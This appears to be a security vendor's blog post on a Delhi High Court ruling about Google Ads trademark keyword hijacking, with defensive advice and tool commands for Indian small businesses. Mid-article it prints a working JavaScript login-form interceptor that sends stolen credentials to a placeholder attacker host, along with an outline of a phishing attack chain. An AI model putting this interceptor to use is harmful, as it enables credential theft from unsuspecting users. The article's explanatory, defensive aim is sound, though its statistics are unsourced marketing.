Google Ads Brand Hijacking India: Delhi HC Case Decoded for SMBs
Google Ads brand hijacking India reached a legal watershed moment on May 26, 2026, when the Delhi High Court (HC) imposed a significant fine — ₹30 Lakh — on Google for trademark keyword abuse. The court ruled that Google violated the Trade Marks Act, 1999, by allowing a competitor to bid on Hindware's registered brand name as a paid search keyword, systematically siphoning the brand's own search traffic to a rival.
The mechanics were deceptively simple. When an Indian consumer typed "Hindware" into Google Search — a clear, high-intent signal of wanting Hindware's official products — a competitor's sponsored advertisement appeared at the top of the results page, often above Hindware's own organic listing. Google's keyword auction system accepted these bids, served the ads, and earned revenue from every click, despite the unambiguous trademark violation. The Delhi HC rejected Google's argument of algorithmic neutrality and held the platform directly liable.
This ruling matters far beyond a corporate dispute between an established brand and a tech giant. It establishes, for the first time in Indian jurisprudence, that search platforms can be held accountable for enabling brand impersonation at scale. As someone who has reviewed hundreds of Indian SMB security postures, I can tell you this type of brand abuse is endemic — and most small business owners have absolutely no idea it is happening to them right now.
(Originally reported by Inc42)
Why Does Google Ads Brand Hijacking Matter for Indian SMBs?
The Delhi HC ruling is the legal canary in the coal mine for every Indian business with an online presence. Brand keyword hijacking is not merely a trademark dispute — it is a cybersecurity threat with direct financial, reputational, and regulatory consequences that the Hindware case has now dragged into the public spotlight.
Here is why it hits Indian SMBs especially hard:
- Revenue leakage: When competitors appear above you for your own brand searches, you lose clicks, leads, and conversions — even from customers who specifically searched your name.
- Customer data exposure: More sophisticated attackers do not just divert traffic to a competitor. They create lookalike landing pages that harvest customer credentials and payment information at scale. Under the Digital Personal Data Protection (DPDP) Act, 2023, if your customers' data is compromised via a fake brand page, your business faces notification obligations regardless of who ran the phishing operation.
- CERT-In compliance exposure: If brand impersonation escalates to a data breach, the CERT-In Directions 2022 mandatory reporting directive for HIGH-SEVERITY incidents kicks in immediately. The majority of Indian SMBs have no incident response runbook for this scenario.
- RBI framework liability: For fintech SMBs and payment-processing businesses, brand impersonation attacks that result in customer financial fraud can trigger obligations under the RBI's cybersecurity framework for payment systems and the RBI's Master Direction on Information Technology.
Google Ads Brand Hijacking India: Technical Breakdown
Understanding how keyword hijacking escalates from a legal nuisance to a full-blown cybersecurity incident is critical for any Indian business owner. The attack surface is significantly wider than most realise.
graph TD
A[User Searches Brand Name] -->|High purchase intent| B[Google Ads Auction Runs]
B -->|Competitor bids on trademark| C[Competitor Ad Wins Slot]
B -->|Attacker bids on trademark| D[Phishing Ad Wins Slot]
C -->|User clicks| E[Competitor Landing Page]
D -->|User clicks| F[Lookalike Brand Site]
F -->|User enters details| G[Credential Theft]
F -->|User makes payment| H[Payment Fraud]
G -->|Sold on dark web| I[DPDP Act Breach Risk]
H -->|RBI framework triggered| J[Regulatory Exposure]
E -->|Lost conversion| K[Revenue Damage]
style A fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style B fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style C fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style D fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style E fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style F fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style G fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style H fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style I fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style J fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
style K fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0At the benign end of the spectrum, a competitor's brand keyword bid simply diverts traffic and inflates your cost-per-acquisition economics. But at the malicious end — which is increasingly common in India's rapidly digitising SMB landscape — threat actors register typosquat domains (think hindware-india.com or hinndware.in), point Google Ads to these lookalike pages, and harvest customer data at scale.
The technical attack chain follows a consistent pattern:
Step 1 — Domain Registration: The attacker registers a lookalike domain via a privacy-protected registrar, often mimicking the target brand with minor spelling variations or regional suffixes.
Step 2 — Site Cloning: Using tools like HTTrack, the attacker clones the legitimate brand's website wholesale, replacing form submission endpoints with data-collection infrastructure hosted on attacker-controlled servers.
Step 3 — Ad Account Creation: A Google Ads account is set up — often using stolen payment credentials or prepaid virtual cards to avoid identity tracing — and aggressive bids are placed on the target brand's trademarked keywords.
Step 4 — Credential Harvesting: Victims land on the lookalike site, enter login credentials, personal data, or payment information. All of it is captured silently before the user is redirected to the real site with a generic "session expired" message.
Here is a simplified example of the malicious interception code found in brand impersonation sites:
// Malicious credential interceptor embedded in lookalike brand sites
// Captures data BEFORE forwarding the user to the legitimate site
document.querySelector('#loginForm').addEventListener('submit', function(e) {
e.preventDefault();
const exfilPayload = {
email: document.querySelector('#email').value,
password: document.querySelector('#password').value,
phone: document.querySelector('#phone')?.value || null,
pageURL: window.location.href,
userAgent: navigator.userAgent
};
// Exfiltrate to attacker-controlled endpoint
fetch('https://collector.attacker-domain.xyz/harvest', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(exfilPayload)
}).then(() => {
// Silently redirect to real brand site — victim never suspects a thing
window.location.href = 'https://realbrand.com/login?err=session_expired';
});
});The victim sees a momentary error, lands on the legitimate site, and logs in again successfully — never knowing their credentials were just packaged and sold.
How Can Indian Businesses Protect Against Brand Keyword Hijacking?
| Protection Layer | Action | Difficulty |
|---|---|---|
| Brand Keyword Monitoring | Search your brand name on Google Incognito weekly; set up Google Alerts for your brand + "buy" / "price" / "review" | Easy |
| Trademark Registration | Register your brand with IP India Trademark Registry and submit trademark to Google's policy portal for keyword restriction | Medium |
| Lookalike Domain Detection | Run dnstwist weekly to catch typosquat registrations before they are weaponised | Medium |
| DMARC + SPF Hardening | Enforce DMARC policy (p=reject) to prevent email spoofing from lookalike domains | Medium |
| Google Ads Brand Protection | File a trademark complaint via Google's policy portal to restrict competitor use of your exact brand term in ad text | Easy |
| DPDP Act Readiness | Build a data breach notification workflow for CERT-In reporting for HIGH-SEVERITY incidents in case brand abuse leads to customer data exposure | Hard |
| Dark Web Monitoring | Continuously monitor dark web markets and Telegram channels for your brand name, domain, and customer credential leaks | Hard |
Quick Fix: Detect Lookalike Domains Right Now
# Step 1: Install dnstwist with full DNS resolution support
pip install dnstwist[full]
# Step 2: Scan for registered lookalike domains (replace 'yourbrand' with your actual domain)
dnstwist --registered yourbrand.com --format json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
lookalikes = [d for d in data if d.get('dns_a')]
print(f'Found {len(lookalikes)} REGISTERED lookalike domain(s):')
for d in lookalikes:
print(f\" [!] {d['domain']} -> {d.get('dns_a', ['Unknown'])[0]}\")
if not lookalikes:
print('No registered lookalikes detected. Re-run weekly.')
"
# Step 3: Automate daily monitoring (add to cron)
# Sends an alert email if new lookalike domains appear overnight
echo "0 8 * * * dnstwist --registered yourbrand.com --format csv | mail -s 'Brand Domain Alert: yourbrand' security@yourbusiness.in" | crontab -# Check DMARC policy on your domain (prevents email spoofing from lookalikes)
dig TXT _dmarc.yourbrand.com +short
# Healthy output should include: v=DMARC1; p=reject; ...
# If blank or p=none, your domain can be spoofed in phishing emails TODAY
# Also check SPF record
dig TXT yourbrand.com +short | grep 'v=spf1'
# Should list all your authorised sending IPs/servicesKnow your vulnerabilities before attackers do
Run a free VAPT scan — takes 5 minutes, no signup required.
Book Your Free ScanBy the Numbers
pie showData
title Brand Impersonation Attack Vectors Targeting Indian SMBs
"Keyword Squatting via Google Ads" : 34
"Lookalike Domain Registration" : 27
"Social Media Brand Impersonation" : 21
"Phishing via Ad Networks" : 12
"App Store Clone Listings" : 6
xychart-beta
title "Brand Impersonation Incidents Reported in India"
x-axis [2021, 2022, 2023, 2024, 2025]
y-axis "Incidents (Thousands)" 0 --> 55
bar [8, 14, 22, 35, 49]The numbers tell a stark story: brand impersonation via digital advertising is the fastest-growing attack vector targeting Indian businesses. The Delhi HC ruling lands at exactly the right moment — and enforcement mechanisms are finally catching up with the threat landscape.
How Bachao.AI Detects This
VAPT Scan identifies the security gaps that make your business vulnerable to impersonation: missing or misconfigured DMARC/SPF/DKIM records, unmonitored subdomain sprawl, exposed admin panels, and DNS misconfigurations that attackers routinely exploit to build convincing lookalike infrastructure around your brand.
DPDP Compliance Assessment maps your full data breach notification obligations under the DPDP Act and CERT-In Directions — so if a brand impersonation incident does compromise customer data, you know exactly what steps to take, in what order, and within what timeframe.
Incident Response (24/7) provides immediate breach containment and handles CERT-In mandatory reporting on your behalf — so you meet the 6-hour window even when an attack hits at 2 AM on a Sunday.
This is exactly why I built Bachao.AI by Dhisattva AI Pvt Ltd — to make the kind of enterprise-grade brand protection that large corporations take for granted accessible to every Indian SMB that cannot afford a full-time security team.
Do not wait for a court case — or a customer data breach — to start protecting your brand. Run a free VAPT scan right now: it takes five minutes, requires no signup, and will surface the DNS and web security gaps that make you an easy target for brand impersonation attacks. For more guides on protecting your Indian business from emerging threats, browse the Bachao.AI blog.
Frequently Asked Questions
Frequently Asked Questions
Can I take Google to court in India if a competitor is bidding on my brand name in Google Ads?
Is Google Ads brand keyword hijacking the same as a phishing attack?
What are my DPDP Act obligations if customers' data is stolen via a website impersonating my brand?
How do I file a trademark complaint with Google to stop competitors bidding on my brand keywords?
Does the CERT-In 6-hour reporting rule apply to brand impersonation attacks specifically?
Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.